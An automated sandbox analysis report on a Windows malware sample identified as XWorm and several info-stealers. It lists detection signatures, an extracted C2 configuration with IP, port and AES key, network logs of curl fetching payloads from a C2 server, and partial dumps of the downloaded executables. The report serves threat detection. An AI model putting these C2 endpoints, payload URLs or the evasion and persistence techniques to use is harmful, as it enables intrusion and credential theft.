Windows Analysis Report
ZOL2mIYAUH.exe

Overview

General Information

Sample name: ZOL2mIYAUH.exe
renamed because original name is a hash value
Original sample name: 789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6.exe
Analysis ID: 1561594
MD5: 12395d08dc0bfe12e63605328ddd982f
SHA1: 51ceb544e3900fb85fe7aada564d081219464d1d
SHA256: 789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6
Tags: exeuser-Chainskilabs
Infos:

Detection

Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
Yara detected PureLog Stealer
Yara detected XWorm
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: ZOL2mIYAUH.exe Avira: detected
Source: http://79.110.49.246/didedba/write Avira URL Cloud: Label: malware
Source: http://79.110.49.246/didedba/dddv Avira URL Cloud: Label: malware
Source: http://79.110.49.246/didedba/abc Avira URL Cloud: Label: malware
Source: C:\Users\Public\winnotify.scr Avira: detection malicious, Label: HEUR/AGEN.1354408
Source: C:\Users\gbcd\qqq.scr Avira: detection malicious, Label: HEUR/AGEN.1354408
Source: C:\Users\gbcd\fff.scr Avira: detection malicious, Label: HEUR/AGEN.1354408
Source: 00000018.00000002.3715480219.0000000005101000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["79.110.49.246"], "Port": 2331, "Aes key": "<e4efraq2sdsfvrf>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\Public\winnotify.scr ReversingLabs: Detection: 51%
Source: C:\Users\gbcd\ddd.scr ReversingLabs: Detection: 83%
Source: C:\Users\gbcd\qqq.scr ReversingLabs: Detection: 51%
Source: C:\Users\gbcd\srtware.exe ReversingLabs: Detection: 37%
Source: ZOL2mIYAUH.exe ReversingLabs: Detection: 65%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\winnotify.scr Joe Sandbox ML: detected
Source: C:\Users\gbcd\qqq.scr Joe Sandbox ML: detected
Source: C:\Users\gbcd\fff.scr Joe Sandbox ML: detected
Source: ZOL2mIYAUH.exe Joe Sandbox ML: detected

Compliance

barindex
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Unpacked PE file: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack
Source: C:\Users\gbcd\fff.scr Unpacked PE file: 23.2.fff.scr.a50000.0.unpack
Source: C:\Users\Public\winnotify.scr Unpacked PE file: 37.2.winnotify.scr.450000.0.unpack
Source: ZOL2mIYAUH.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.7:49756 version: TLS 1.2
Source: Binary string: srtware.pdb source: ZOL2mIYAUH.exe, ZOL2mIYAUH.exe, 00000000.00000002.3688530749.00000000001C2000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00469CD8 lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00469CD8
Source: C:\Users\gbcd\fff.scr Code function: 23_2_00D33CD8 lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 23_2_00D33CD8

Networking

barindex
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 79.110.49.246:2331 -> 192.168.2.7:49868
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49868 -> 79.110.49.246:2331
Source: Malware configuration extractor URLs: 79.110.49.246
Source: Yara match File source: 23.2.fff.scr.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.winnotify.scr.450000.0.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.7:49767 -> 79.110.49.246:5152
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 20:09:14 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Thu, 21 Nov 2024 21:20:44 GMTETag: "134200-62772d6da8ce1"Accept-Ranges: bytesContent-Length: 1262080Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 4c 15 2a 67 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 02 19 00 00 05 00 00 08 00 00 00 00 00 00 84 9d 00 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 3c 00 00 04 00 00 00 00 00 00 02 00 60 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 00 2f 00 10 02 00 00 00 60 05 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 20 00 00 00 c8 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 20 05 00 00 02 00 00 00 cc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 40 05 00 00 02 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 20 00 00 00 60 05 00 00 04 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 29 00 00 80 05 00 00 ba 02 00 00 d4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 35 64 63 76 65 77 00 c0 0d 00 00 00 2f 00 00 b4 0d 00 00 8e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 95 13 2c 72 ee b9 a5 41 ab dd 93 03 5c 04 90 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 20:09:19 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Thu, 21 Nov 2024 16:38:24 GMTETag: "124400-6276ee5246017"Accept-Ranges: bytesContent-Length: 1197056Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 df 5e 3f 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 02 19 00 56 03 00 00 08 00 00 00 00 00 00 61 15 01 00 00 20 00 00 00 80 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 3b 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 60 2d 00 10 02 00 00 00 c0 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 03 00 00 20 00 00 00 c6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 80 03 00 00 02 00 00 00 ca 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 a0 03 00 00 02 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 20 00 00 00 c0 03 00 00 04 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 29 00 00 e0 03 00 00 ba 02 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 73 74 6f 76 66 63 77 00 c0 0d 00 00 60 2d 00 00 b8 0d 00 00 8c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 57 89 cb 21 e9 2a ee aa 15 1c 20 57 98 10 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 20:09:23 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Fri, 17 May 2024 19:23:02 GMTETag: "285c00-618ab47b95f4c"Accept-Ranges: bytesContent-Length: 2644992Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 a5 7e 2a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 66 00 00 00 f2 27 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 28 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 90 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 80 28 00 80 01 00 00 00 00 00 00 00 00 00 00 00 b0 28 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 80 00 00 28 00 00 00 10 84 00 00 38 01 00 00 00 00 00 00 00 00 00 00 28 92 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 64 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 17 00 00 00 80 00 00 00 18 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 50 dc 27 00 00 a0 00 00 00 d2 27 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 80 28 00 00 02 00 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 90 28 00 00 02 00 00 00 56 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 a0 28 00 00 02 00 00 00 58 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 78 00 00 00 00 b0 28 00 00 02 00 00 00 5a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View IP Address: 104.26.0.100 104.26.0.100
Source: Joe Sandbox View ASN Name: OTAVANET-ASCZ OTAVANET-ASCZ
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /huuuuggga/aaaaa1/refs/heads/main/srtware.exe HTTP/1.1Host: raw.githubusercontent.comUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /didedba/abc HTTP/1.1Host: 79.110.49.246User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /didedba/dddv HTTP/1.1Host: 79.110.49.246User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /didedba/write HTTP/1.1Host: 79.110.49.246User-Agent: curl/7.83.1Accept: */*
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: get.geojs.io
Source: curl.exe, 0000000E.00000002.1394377275.0000000002AC0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1394377275.0000000002AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/abc
Source: curl.exe, 0000000E.00000002.1394377275.0000000002AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/abc-oC:
Source: curl.exe, 0000000E.00000002.1394377275.0000000002AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/abccej
Source: curl.exe, 0000000E.00000002.1394377275.0000000002AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/abce
Source: curl.exe, 0000000E.00000002.1394377275.0000000002AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/abck$
Source: curl.exe, 0000000E.00000002.1394377275.0000000002AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/abck0
Source: curl.exe, 0000000E.00000002.1394377275.0000000002AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/abcn
Source: curl.exe, 00000010.00000002.1443859445.00000000004C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddv
Source: curl.exe, 00000010.00000002.1443859445.00000000004C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddv-oC:
Source: curl.exe, 00000010.00000002.1443859445.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddv32
Source: curl.exe, 00000010.00000002.1443859445.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddvK
Source: curl.exe, 00000010.00000002.1443859445.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddvc
Source: curl.exe, 00000010.00000002.1443859445.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddvce
Source: curl.exe, 00000010.00000002.1443859445.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddveW
Source: curl.exe, 00000010.00000002.1443859445.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddveo
Source: curl.exe, 00000010.00000002.1443859445.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/dddves
Source: curl.exe, 00000013.00000002.1511983563.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1511870515.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/write
Source: curl.exe, 00000013.00000002.1511983563.00000000030D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/write-oC:
Source: curl.exe, 00000013.00000002.1511983563.00000000030D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.110.49.246/didedba/writes
Source: powershell.exe, 00000008.00000002.1326963673.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000001D.00000002.1844472674.0000000006DE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: fff.scr, 00000017.00000002.1627355609.00000000051DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://get.geojs.io
Source: fff.scr, 00000017.00000002.1627355609.00000000051DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://get.geojs.iod
Source: powershell.exe, 00000008.00000002.1331519717.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1721126389.0000000005FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1776932795.0000000005817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1931775752.0000000005FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001F.00000002.1882121555.00000000050A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1327908559.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1707922266.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1753231348.0000000004906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1814588649.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1882121555.00000000050A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ZOL2mIYAUH.exe, 00000000.00000002.3720014163.00000000047DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1327908559.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.0000000005071000.00000004.00000800.00020000.00000000.sdmp, qqq.scr, 00000018.00000002.3715480219.0000000005101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1707922266.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1753231348.00000000047B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1814588649.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1882121555.0000000004F51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1327908559.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1707922266.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1753231348.0000000004906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1814588649.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1882121555.00000000050A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: srtware.exe.21.dr String found in binary or memory: http://scripts.sil.org/OFL).http://www.typoland.com/designers/Lukasz_Dziedzic/http://www.typoland.co
Source: srtware.exe.21.dr String found in binary or memory: http://scripts.sil.org/OFLCopyright
Source: powershell.exe, 0000001F.00000002.1882121555.00000000050A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: ZOL2mIYAUH.exe, fff.scr String found in binary or memory: http://www.enigmaprotector.com/
Source: srtware.exe.21.dr String found in binary or memory: http://www.typoland.com/)
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000008.00000002.1327908559.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1707922266.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1753231348.00000000047B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1814588649.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1882121555.0000000004F51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
